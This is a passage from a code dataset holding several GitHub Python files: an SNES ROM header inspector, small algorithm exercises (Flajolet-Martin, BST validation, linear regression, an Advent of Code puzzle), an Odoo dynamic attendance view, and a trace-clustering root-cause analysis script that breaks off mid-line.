self.smc_offset = self.get_smc_offset(filename)\n self.calculated_checksum = self.calculate_checksum()\n\n for f in (self.LOROM_HEADER, self.HIROM_HEADER):\n rom_segment = hexview.read_file(filename, self.HEADER_SIZE, f + self.smc_offset)\n checksum_and_complement_verfication = self.check_checksum_and_complement(rom_segment)\n potential_rom_mapping = self.get_specified_rom_mapping(rom_segment)\n\n if f == self.LOROM_HEADER:\n possible_types = [32, 35, 48, 50]\n else:\n possible_types = [33, 49, 53]\n\n if (checksum_and_complement_verfication == 'ffff') and (potential_rom_mapping[0] in possible_types):\n self.header = rom_segment\n self.rom_mapping = potential_rom_mapping[1]\n self.header_address = f + self.smc_offset\n\n self.game_title = str(self.header[0:20])\n self.rom_type = self.ROM_TYPES.get(self.header[22])\n self.rom_size = 1 << (self.header[23] - 7)\n self.sram_size = 1 << (self.header[24] + 3)\n self.country = self.COUNTRY_TABLE.get(self.header[25])\n self.licensee = self.LICENSEES.get(self.header[26])\n self.version = self.header[27]\n self.checksum_complement = '{:02x}{:02x}'.format(self.header[29], self.header[28])\n self.header_checksum = '{:02x}{:02x}'.format(self.header[31], self.header[30])\n\n def calculate_checksum(self):\n f = open(self.filename, 'rb')\n f.seek(self.smc_offset)\n chunk_sums = []\n for chunk in read_in_chunks(f):\n total = 0\n for byte in chunk:\n total += byte\n chunk_sums.append(total)\n\n total = 0\n\n for csum in chunk_sums:\n total += csum\n\n return '{:04x}'.format(total & int('FFFF', 16))\n\n @staticmethod\n def check_checksum_and_complement(header):\n complement = int('{:02x}{:02x}'.format(header[29], header[28]), 16)\n checksum = int('{:02x}{:02x}'.format(header[31], header[30]), 16)\n return '{:04x}'.format(complement | checksum)\n\n @staticmethod\n def get_specified_rom_mapping(header):\n mapping_type = header[21]\n # yeah, I know a lookup table is lame when this is basically a bitmask\n # problem is, I have trouble resolving some of the values based on the\n # bitmask described https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n # such as SA-1 ROM. For now I'll return both the value and description\n # and the last bit of the value may still be used to verify lo-rom / hi-rom label\n mappings = {32: 'LoROM',\n 33: 'HiRom',\n 35: 'SA-1 ROM',\n 48: 'LoROM + FastROM',\n 49: 'HiRom + FastROM',\n 50: 'ExLoROM',\n 53: 'ExHiRom'}\n return [mapping_type, mappings.get(mapping_type)]\n\n @staticmethod\n def get_smc_offset(filename):\n size = os.path.getsize(filename)\n # https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n # Before you try to load in these informations, you have to determine\n # the size of the SMC, may it be there or not. The length of the ROM\n # modulo 1024 (ROM size % $400) gives you the size of the SMC header.\n # If it's 0, there is no header. If it's not 512, the header is malformed\n return size % 1024\n\n\ndef read_in_chunks(file_object, chunk_size=500000):\n while True:\n data = file_object.read(chunk_size)\n if not data:\n break\n yield data\n\n\ndef main(args):\n for f in args.filename:\n try:\n header = Header(f)\n print()\n\n if header.smc_offset > 0:\n smc = 'Yes'\n else:\n smc = 'No'\n\n print('Game Title: {}'.format(header.game_title))\n print('SMC Header: {}'.format(smc))\n print('Rom Mapping: {}'.format(header.rom_mapping))\n print('Rom Type: {}'.format(header.rom_type))\n print('Rom Size: {} MegaBits'.format(header.rom_size))\n print('SRAM Size: {} Kilobits'.format(header.sram_size))\n print('Country: {}'.format(header.country))\n print('Licensee: {}'.format(header.licensee))\n print('Game Version: {}'.format(header.version))\n print('Checksum Complement: {}'.format(header.checksum_complement))\n print('Specified Checksum: {}'.format(header.header_checksum))\n print('Calculated checksum: {}'.format(header.calculated_checksum))\n\n print()\n hexview.print_canonical(header.header, header.header_address)\n print()\n\n except FileNotFoundError:\n print('File {} was not found'.format(f))\n except Exception as e:\n print('In {}: General error {}. May not be an SNES ROM file.'.format(f, e))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='snes_rom_info.py', usage='%(prog)s filename')\n parser.add_argument('filename', help=\"The ROM you wish to analyze\", nargs='*')\n args = parser.parse_args()\n main(args)\n","repo_name":"tetrismegistus/snes_rom_info","sub_path":"snes_rom_info.py","file_name":"snes_rom_info.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70760143513","text":"hash_fn = lambda x: (3 * x + 1) % 5\n\n\ndef fm(inp, hash_fns=(hash_fn, )):\n \"\"\"\n inp: iterable of ints\n hash_fns: list of callables with one ip.\n \"\"\"\n last_set_value = lambda n: (n & ~(n - 1)) # face value of last set bit\n est = [max(map(lambda x: last_set_value(hfn(x)), inp)) for hfn in hash_fns]\n print(f\"Average estimated unique values: {sum(est) / len(est)}\")\n\n\nif __name__ == '__main__':\n inp = [10, 12, 13, 3, 4, 25, 7, 10, 4]\n fm(inp)\n\n","repo_name":"bhushan-borole/BDA-Experiments","sub_path":"flajolet_martin/fm_rishabh_one_liner.py","file_name":"fm_rishabh_one_liner.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21700435004","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def divideAndConquer(self, root: Optional[TreeNode], left: Optional[TreeNode], right: Optional[TreeNode]) -> bool:\n if not root: return True\n if left and left.val >= root.val : return False\n if right and root.val >= right.val: return False\n if not self.divideAndConquer(root.left, left, root) : return False\n if not self.divideAndConquer(root.right, root, right) : return False\n return True\n\n def isValidBST(self, root: Optional[TreeNode]) -> bool:\n return self.divideAndConquer(root, None, None)\n \n ","repo_name":"svefa/coding_tasks_python","sub_path":"bst/validate/isValidBST.py","file_name":"isValidBST.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"42016522883","text":"# -*- coding: utf-8 -*-\n# @Date : 2020-01-22\n# @Author : water\n# @Version : v1.0\n# @Desc : 最小二乘法做线性回归的预测\n# 1.使用线性回归预测糖尿病,选取的是第四个参数(列表里实际是3)\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.linear_model import LinearRegression\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef linear1():\n # 1.导入数据\n datas = load_diabetes()\n x = datas.data[:,np.newaxis,3]\n y = datas.target[:,np.newaxis]\n # print(x) # \n # print(y.shape)\n # print(datas.DESCR)\n # 2.数据加工\n x_train = x[:-40]\n y_train = y[:-40]\n print(x_train.shape)\n x_test = x[-40:]\n y_test = y[-40:]\n # 3.建模\n linear = LinearRegression()\n # 4.训练模型\n linear.fit(x_train,y_train)\n # 5.结果\n y_predict = linear.predict(x_test)\n print(linear.score(x_test,y_test))\n # 6.图\n plt.scatter(x_test,y_test)\n plt.plot(x_test,y_predict)\n plt.show()\n\ndef linear2():\n '''\n 求解方程组\n x+y=3\n x-y=1\n x=2,y=1 -->result是\n :return:\n '''\n x_train = np.array([[1,1],[1,-1]])\n y_train = np.array([3,1])\n result = np.dot(np.linalg.inv(x_train),y_train)\n print(result)\n linear = LinearRegression()\n linear.fit(x_train,y_train)\n x_test = np.array([[1,0],[0,1]])\n print(linear.coef_)\n y_predict = linear.predict(x_test)\n print(y_predict)\n\n\ndef main():\n # linear1()\n linear2()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"gin2010/python_study","sub_path":"data_and_ai/machine_learn/linear_start.py","file_name":"linear_start.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9749281645","text":"#!/usr/bin/env python3\n\nclass Map(object):\n def __init__(self, m, bg):\n self.m = m\n self.swap = {}\n self.bg = bg\n xmin = ymin = 1E10\n xmax = ymax = -1E10\n for x, y in self.m.keys():\n if xmin > x: xmin = x\n if xmax < x: xmax = x\n if ymin > y: ymin = y\n if ymax < y: ymax = y\n self.pmin = xmin, ymin\n self.pmax = xmax+1, ymax+1\n\n def enhance(self, index):\n if self.bg == \"#\":\n nbg = index[-1]\n else:\n nbg = index[0]\n\n xmin = ymin = 1E10\n xmax = ymax = -1E10\n self.swap.clear()\n for y in range(self.pmin[1]-2, self.pmax[1]+2):\n for x in range(self.pmin[0]-2, self.pmax[0]+2):\n idx = 0\n for ny in range(y-1, y+2):\n for nx in range(x-1, x+2):\n idx <<= 1\n if self.m.get((nx, ny), self.bg) == \"#\":\n idx |= 1\n if index[idx] != nbg:\n self.swap[x, y] = index[idx]\n if xmin > x: xmin = x\n if xmax < x: xmax = x\n if ymin > y: ymin = y\n if ymax < y: ymax = y\n\n self.m, self.swap = self.swap, self.m\n self.bg = nbg\n self.pmin = xmin, ymin\n self.pmax = xmax+1, ymax+1\n\ndef parse(txt):\n algo, m = None, {}\n state = 0\n y = 0\n for row in txt.splitlines():\n if state == 0:\n if not row:\n state = 1\n else:\n algo = row\n else:\n for x, e in enumerate(row):\n if e == \"#\":\n m[x, y] = e\n y += 1\n\n return Map(m, \".\"), algo\n\nimport sys\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Usage: {} \".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n try:\n with open(sys.argv[1], \"rt\") as f:\n txt = f.read()\n\n m, algo = parse(txt)\n for i in range(2):\n m.enhance(algo)\n print(\"Part1:\", len(m.m))\n for i in range(48):\n m.enhance(algo)\n print(\"Part2:\", len(m.m))\n except FileNotFoundError:\n print(\"Cannot open {}\".format(sys.argv[1]), file=sys.stderr)\n sys.exit(1)\n","repo_name":"funnydog/AoC2021","sub_path":"day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37511897228","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom lxml import etree\n\nfrom openerp import models, fields, api\nfrom openerp.osv.orm import setup_modifiers\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\n# class /users/moylop260/odoo/dynamic_view(models.Model):\n# _name = '/users/moylop260/odoo/dynamic_view./users/moylop260/odoo/dynamic_view'\n\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n# class HRAttendance(models.Models):\n\nclass DynamicView(models.Model):\n _name = 'dynamic.view'\n _auto = False\n\n employee_id = fields.Many2one('hr.employee', store=False, readonly=True)\n\n field_view_definition = ''\n default_state = None\n\n def get_field_states(self, label):\n states = self.env['hr.attendance']._fields['action'].selection\n return fields.Selection(states, string=label, automatic=True)\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False,\n submenu=False):\n result = super(DynamicView, self).fields_view_get(\n view_id, view_type, toolbar=toolbar, submenu=submenu)\n if view_type == 'tree':\n doc = etree.XML(result['arch'])\n node = doc.xpath(\"//field[@name='employee_id']\")[0]\n parent_node = node.getparent()\n date_work = datetime.now()\n node_work = node\n for i in range(10):\n date_name = date_work.strftime('%b %d')\n t_date_name = date_work.strftime(DEFAULT_SERVER_DATE_FORMAT)\n self._add_field(t_date_name, self.get_field_states(date_name))\n self._proper_fields |= set(t_date_name)\n date_node = etree.fromstring(\n self.field_view_definition % t_date_name)\n parent_node.insert(parent_node.index(node) + 1, date_node)\n date_work += timedelta(days=1)\n node_work = date_node\n self._setup_fields(partial=True)\n result['arch'], result['fields'] = (\n self.env['ir.ui.view'].postprocess_and_fields(\n self._name, doc, None))\n # self = self.create({'employee_id': 1})\n return result\n\n @api.model\n def search_read(self, domain=None, fields=None, offset=0, limit=None, order=None):\n # res = super(DynamicView, self).search_read(\n # domain=domain, fields=fields, offset=offset, limit=limit, order=order)\n # TODO: Process the domain based on employee data\n attendance_brw = self.env['hr.attendance']\n employees = self.env['hr.employee'].search(\n [], limit=limit, offset=offset)\n res = []\n data_initial = dict((field, self.default_state)\n for field in fields if field[0].isdigit()) # Just dates fields\n attendances = attendance_brw.search([\n ('employee_id', 'in', employees.ids),\n ('name', 'in', data_initial.keys()),\n ])\n # print \"*\"*10,len(attendances), len(employees)\n attendances_dict = {}\n for attendance in attendances:\n date_name = attendance.name[:10]\n attendances_dict.setdefault(attendance.employee_id.id, {}).update({\n date_name: attendance.action,\n })\n dynamic_view = self.env['dynamic.view']\n for employee in employees:\n data = data_initial.copy()\n data.update(dict(\n employee_id=employee.id,\n **(attendances_dict.get(employee.id) or {})\n ))\n self.browse(employee.id)._update_cache(data)\n data.update(dict(id=employee.id))\n res.append(data)\n return res\n\n @api.multi\n def write(self, vals):\n self.ensure_one()\n attendance_brw = self.env['hr.attendance']\n employee_id = self.id\n domain = [('employee_id', '=', employee_id),\n # ('name', 'in', vals.keys())]) # TODO: Enable this line for the model where is used date. (and not datetime)\n ]\n attendances_dict = dict((attendance.name[:10], attendance) for attendance in attendance_brw.search(domain) if attendance.name[0].isdigit())\n for attendance_date in vals:\n attendance = attendances_dict.get(attendance_date)\n data = dict(\n employee_id=employee_id,\n action=vals[attendance_date],\n name=attendance_date + ' 00:00:00'\n )\n if not attendance:\n attendance = attendance_brw.create(data)\n else:\n attendance.write(data)\n self._update_cache(vals)\n # self.env['dynamic.view'].new(data)\n # vals.update({'employee_id': self.id})\n return True\n\n @api.multi\n def _update_cache(self, vals):\n for record in self:\n record._cache.update(record._convert_to_cache(vals, update=True))\n # mark the fields as being computed, to avoid their invalidation\n for key in vals:\n # self.env.cache.set\n self.env.computed[self._fields[key]].update(self._ids)\n # inverse the fields\n # for key in vals:\n # self._fields[key].determine_inverse(self) # get error\n for key in vals:\n self.env.computed[self._fields[key]].difference_update(self._ids)\n\n","repo_name":"moylop260/dynamic-view","sub_path":"dynamic_view/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12673446148","text":"from importlib.resources import path\nfrom multiprocessing import connection\nfrom re import T\nimport torch\nimport json\nimport argparse\nimport numpy as np\nimport random\nimport os\nfrom tqdm import tqdm\nfrom torch_geometric.loader import DataLoader\nfrom torch.utils.data import Subset\nimport time\nimport sys\nimport datetime\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score\nfrom DataPreprocess.STVProcess import embedding_to_vector, load_dataset, process_one_trace, check_match, get_service_slo\nfrom DenStream.DenStream import DenStream\nfrom CEDAS.CEDAS import CEDAS\nfrom MicroRank.preprocess_data import get_span, get_service_operation_list, get_operation_slo\nfrom MicroRank.online_rca import rca\nfrom DataPreprocess.params import span_chaos_dict, trace_chaos_dict, request_period_log, normal_change_log\nfrom db_utils import *\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nTwo_error = False\nK = [1, 3, 5, 7, 10] if Two_error==False else [2, 3, 5, 7, 10]\nall_path = dict()\noperation_service_dict = dict()\nRCA_level = 'service' # operation\nuse_manual = False\nmanual_labels_list = []\n# manual_labels_list = ['617d5c02352849119c2e5df8b70fa007.36.16503361793140001', 'dda6af5c49d546068432825e17b981aa.38.16503361824380001', '27a94f3afad745c69963997831868eb1.38.16503362398950001', '15480e1347c147a086b68221ca743874.38.16503369859250001', '262b9727d1584947a02905150a089faa.38.16503382599320123', 'ab212da6fff042febb91b313658a0005.46.16503384128150203', '0b225e568e304836a7901e0cff56205a.39.16503393835170053', '262b9727d1584947a02905150a089faa.39.16503397746270231'] # 人工标注为正常的 trace id 列表 manual_labels_list : [trace_id1, trace_id2, ...]\nfirst_tag = True\n# start_str = '2022-04-19 10:42:59' # '2022-04-18 21:08:00' # '2022-04-19 10:42:59' # trace: '2022-02-25 00:00:00', '2022-04-16 20:08:03', '2022-04-18 11:00:00', '2022-04-18 21:00:00'; span: '2022-01-13 00:00:00'\n# format stage\n# start_str = '2022-04-18 21:08:00' # changes\n# start_str = '2022-04-22 22:00:00' # changes new\n# start_str = '2022-04-18 11:00:00' # 1 abnormal\n# start_str = '2022-04-19 10:42:59' # 2 abnormal\n# start_str = '2022-04-24 19:00:00' # 2 abnormal new\n# start_str = '2022-04-26 21:00:00' # 1 abnormal new 2022-04-26 21:02:22\n# start_str = '2022-04-28 12:00:00'\n# start_str = '2022-04-27 15:50:00' # 1 abnormal avail\n# start_str = '2022-05-01 00:00:00' # 1 change\n# start_str = '2022-04-28 12:00:00' # 2 abnormal\n# start_str = '2022-05-05 19:00:00' # 1 abnormal new 5-6\nstart_str = '2022-05-09 15:00:00' # change new 5-10\n\n# init stage\n# init_start_str = '2022-04-18 00:00:05' # normal old\ninit_start_str = '2022-04-26 08:22:09' # normal new\nwindow_duration = 6 * 60 * 1000 # ms\nwindow_duration_init = 6 * 60 * 1000 / 4 # ms\ncheck_window = 5 * 60 * 1000 # ms\nAD_method = 'DenStream_withoutscore' # 'DenStream_withscore', 'DenStream_withoutscore', 'CEDAS_withscore', 'CEDAS_withoutscore'\nSample_method = 'none' # 'none', 'micro', 'macro', 'rate'\ndataLevel = 'trace' # 'trace', 'span'\npath_decay = 0.01\npath_thres = 0.0\nreCluster_thres = 0.1\n\ndef timestamp(datetime: str) -> int:\n timeArray = time.strptime(str(datetime), \"%Y-%m-%d %H:%M:%S\")\n ts = int(time.mktime(timeArray)) * 1000\n return ts\n\ndef ms2str(ms: int) -> str:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(ms/1000))\n\ndef intersect_or_not(start1: int, end1: int, start2: int, end2: int):\n if max(start1, start2) < min(end1, end2):\n return True\n else:\n return False\n\ndef get_operation_service_pairs(dataset):\n global operation_service_dict\n for trace_id, trace in dataset.items():\n for vertex_id, vertex in trace['vertexs'].items():\n if vertex_id == '0':\n continue\n if vertex[1] not in operation_service_dict.keys(): # operation\n operation_service_dict[vertex[1]] = vertex[0]\n\ndef simplify_cluster(cluster_obj, dataset, cluster_status, data_status): # dataset: [[STVector1, sample_info1], [STVector2, sample_info2]]\n global all_path\n global first_tag\n manual_count = 0\n for data in tqdm(dataset, desc=\"Cluster Samples: \"):\n # ========================================\n # Path vector encoder\n # ========================================\n if cluster_status == 'init':\n for status in all_path.values():\n status[0] -= path_decay\n all_path = process_one_trace(data, all_path)\n STVector = embedding_to_vector(data, all_path)\n elif cluster_status == 'reCluster':\n STVector = data[0]\n\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if use_manual == True and cluster_status == 'init':\n # cluster_obj.update_cluster_and_trace_tables()\n sample_label, label_status = cluster_obj.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list, stage=cluster_status)\n elif AD_method in ['CEDAS_withoutscore', 'CEDAS_withscore']:\n if first_tag:\n # 1. Initialization\n sample_label, label_status = cluster_obj.initialization(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list)\n first_tag = False\n else:\n cluster_obj.changed_cluster = None\n # 2. Update Micro-Clusters\n sample_label, label_status = cluster_obj.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list)\n # 3. Kill Clusters\n cluster_obj.kill()\n if cluster_obj.changed_cluster and cluster_obj.changed_cluster.count > cluster_obj.threshold:\n # 4. Update Cluster Graph\n cluster_obj.update_graph()\n\n # label_status\n if label_status == 'manual':\n manual_count += 1\n\n\ndef init_Cluster(cluster_obj, init_start_str):\n # ========================================\n # Init time window\n # ========================================\n start = timestamp(init_start_str) # + 1 * 60 * 1000\n end = start + window_duration_init\n timeWindow_count = 0\n\n # ========================================\n # Init Data loader\n # ========================================\n if dataLevel == 'trace':\n print(\"Init Data loading ...\")\n # file = open(r'/data/TraceCluster/RCA/total_data/test.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-20_17-34-08/data.json', 'r') # old\n file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-08_14-03-38/data.json', 'r') # new\n raw_data_total = json.load(file)\n get_operation_service_pairs(raw_data_total)\n get_service_slo(raw_data=raw_data_total)\n print(\"Finish init data load !\")\n\n print('Init Start !')\n # Init main loop start\n while True:\n print('--------------------------------')\n print(f'time window: {ms2str(start)} ~ {ms2str(end)}')\n # temp\n # if dataLevel == 'trace':\n # if str(ms2str(start)) not in ['2022-02-25 01:00:00', '2022-02-25 02:00:00', '2022-02-25 03:00:00', '2022-02-25 05:00:00', '2022-02-25 09:00:00', '2022-02-25 11:00:00', '2022-02-25 13:00:00', '2022-02-25 14:00:00', '2022-02-25 17:00:00', '2022-02-25 18:00:00', '2022-02-25 19:00:00']:\n # start = end\n # end = start + window_duration\n # continue\n timeWindow_count += 1\n\n if dataLevel == 'span':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'init')\n elif dataLevel == 'trace':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'init', raw_data_total)\n\n if len(dataset) == 0:\n if start < timestamp(init_start_str) + (8 * 60 * 60 * 1000):\n start = end\n end = start + window_duration_init\n continue\n else: \n break\n \n # do cluster\n simplify_cluster(cluster_obj=cluster_obj, dataset=dataset, cluster_status='init', data_status='init')\n\n start = end\n end = start + window_duration_init\n\n delete_index_candidate = [status[1] for status in all_path.values() if status[0]= reCluster_thres:\n do_reCluster(cluster_obj=cluster_obj, data_status='init', current_time=start)\n\n if timeWindow_count >= int(1 * 60 * 60 * 1000 / window_duration_init):\n break\n \n # update cluster table when finish init\n if use_manual == True:\n cluster_obj.update_cluster_and_trace_tables()\n print('Init finish !')\n\n \n\ndef do_reCluster(cluster_obj, data_status, current_time, label_map_reCluster=dict()):\n print(\"reCluster Start ...\")\n global all_path\n global first_tag\n delete_index = [status[1] for status in all_path.values() if status[0]= abnormal_count:\n cluster.label = 'normal'\n # if use_manual == True:\n # db_update_label(cluster_id=id(cluster), cluster_label=cluster.label)\n else:\n cluster.label = 'abnormal'\n # if use_manual == True:\n # db_update_label(cluster_id=id(cluster), cluster_label=cluster.label)\n label_map_reCluster = new_label_map_reCluster\n\n print(\"reCluster Finish !\")\n\n\n\ndef main():\n # manual labels list\n traceID_list = list()\n\n # ========================================\n # Init path vector encoder\n # all_path = {path1: [energy1, index1], path2: [energy2, index2]}\n # label_map_reCluster = {trace_id1: label1, trace_id2: label2}\n # ========================================\n # differences_count, differences_svc_count, ab_count, ad_count_list, root_cause_check_dict, in_rate, in_count_normal_dict, case_data_num, case_pattern, label_error_traces_init, label_error_traces_format, case_service_pattern = check_match()\n global all_path\n global first_tag\n global manual_labels_list\n label_map_reCluster = dict()\n\n # ========================================\n # Create db table\n # ========================================\n # cluster_sql = '''\n # create table clusters(\n # id int AUTO_INCREMENT primary key not null,\n # cluster_id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # creation_time varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # cluster_label varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # member_count int not null,\n # member_ids varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # cluster_weight float not null,\n # )\n # '''\n # cur.execute(cluster_sql)\n # db_connect.commit()\n\n # ========================================\n # Create cluster object\n # Init clusters\n # ========================================\n if AD_method in ['DenStream_withscore', 'DenStream_withoutscore']:\n # denstream = DenStream(eps=0.3, lambd=0.1, beta=0.5, mu=11)\n denstream = DenStream(eps=1, lambd=0.1, beta=0.2, mu=6, use_manual=use_manual) # eps=80 beta=0.2 mu=6\n init_Cluster(denstream, init_start_str)\n elif AD_method in ['CEDAS_withscore', 'CEDAS_withoutscore']:\n cedas = CEDAS(r0=100, decay=0.001, threshold=5)\n first_tag = True\n init_Cluster(cedas, init_start_str)\n\n # ========================================\n # Init time window\n # ========================================\n # start_buffer <---6min---> start <---6min---> end <---6min---> end_buffer\n start = timestamp(start_str) # + 1 * 60 * 1000\n end = start + window_duration\n start_buffer = start - window_duration\n end_buffer = end + window_duration\n timeWindow_count = 0\n\n # ========================================\n # Init evaluation for AD\n # ========================================\n a_true, a_pred = [], []\n\n # ========================================\n # Init evaluation for RCA\n # ========================================\n trigger_count = 0\n r_true_count = len(request_period_log)\n r_pred_count_0 = 0\n r_pred_count_1 = 0\n r_pred_count_2 = 0\n r_pred_count_3 = 0\n r_pred_count_4 = 0\n TP = 0 # TP 是预测为正类且预测正确 \n TN = 0 # TN 是预测为负类且预测正确\n FP = 0 # FP 是把实际负类分类(预测)成了正类\n FN = 0 # FN 是把实际正类分类(预测)成了负类\n\n # ========================================\n # Init root cause pattern\n # ========================================\n rc_pattern = []\n\n # ========================================\n # Data loader\n # ========================================\n if dataLevel == 'trace':\n print(\"Main Data loading ...\")\n # file = open(r'/data/TraceCluster/RCA/total_data/test.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-17_15-29-46/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_10-05-14/data.json', 'r') # 1 abnormal\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_21-01-30/data.json', 'r') # 2 abnormal\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_11-34-58/data.json', 'r') # change\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-23_13-34-27/data.json', 'r') # change new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-25_12-40-13/data.json', 'r') # abnormal2 new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-27_22-19-20/data.json', 'r') # abnormal1 new new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-27_12-58-19/data.json', 'r') # abnormal1 new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-28_21-01-41/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-28_22-55-23/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-29_21-45-19/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-30_14-39-40/data.json', 'r') # abnormal 1 avail\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-01_13-40-58/data.json', 'r') # change 1\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-30_19-41-29/data.json', 'r') # abnormal 2\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-06_17-28-43/data.json', 'r') # 1 abnormal new 5-6\n file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-11_00-06-32/data.json', 'r') # change new 5-10\n raw_data_total = json.load(file)\n get_operation_service_pairs(raw_data_total)\n print(\"Finish main data load !\")\n\n print('Start !')\n # main loop start\n while True:\n print('--------------------------------')\n print(f'time window: {ms2str(start)} ~ {ms2str(end)}')\n # temp\n # if dataLevel == 'trace':\n # if str(ms2str(start)) not in ['2022-02-25 01:00:00', '2022-02-25 02:00:00', '2022-02-25 03:00:00', '2022-02-25 05:00:00', '2022-02-25 09:00:00', '2022-02-25 11:00:00', '2022-02-25 13:00:00', '2022-02-25 14:00:00', '2022-02-25 17:00:00', '2022-02-25 18:00:00', '2022-02-25 19:00:00']:\n # start = end\n # end = start + window_duration\n # continue\n if ms2str(start) == '2022-05-01 02:12:00' or ms2str(start) == '2022-05-01 00:48:00': \n # order service 的 trace 断开的原因 2022-05-01 00:48:00 ~ 2022-05-01 00:54:00 2022-05-01 02:06:00 ~ 2022-05-01 02:12:00 2022-05-01 02:12:00 这一段时间的召回率很低(0.30),f1 score 0.45\n # 2022-05-01 01:06:00 ~ 2022-05-01 01:12:00 2022-05-01 01:30:00 ~ 2022-05-01 01:36:00 这一段时间的异常检测完全正确,但是根因定位不准,异常trace的结构完全一样\n print(\"find it !\")\n if intersect_or_not(start1=start, end1=end, start2=request_period_log[2][1], end2=request_period_log[2][2]):\n print(\"find it !\")\n \n timeWindow_count += 1\n abnormal_count = 0\n abnormal_map = {}\n abnormal_seq_map = {}\n normal_seq_map = {}\n STV_map_window = {}\n tid_list = []\n if dataLevel == 'span':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'main')\n elif dataLevel == 'trace':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'main', raw_data_total)\n \n if len(dataset) == 0:\n if start < timestamp(start_str) + (8 * 60 * 60 * 1000):\n start = end\n end = start + window_duration\n continue\n else: \n break\n \n a_true, a_pred = [], []\n # Init manual count\n manual_count = 0\n for _, data in tqdm(enumerate(dataset), desc=\"Time Window Samples: \"):\n # ========================================\n # Path vector encoder\n # ========================================\n for status in all_path.values():\n status[0] -= path_decay\n all_path = process_one_trace(data, all_path)\n STVector = embedding_to_vector(data, all_path)\n STV_map_window[data['trace_id']] = np.array(STVector)\n\n a_true.append(data['trace_bool'])\n\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n sample_label, label_status = denstream.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n elif AD_method in 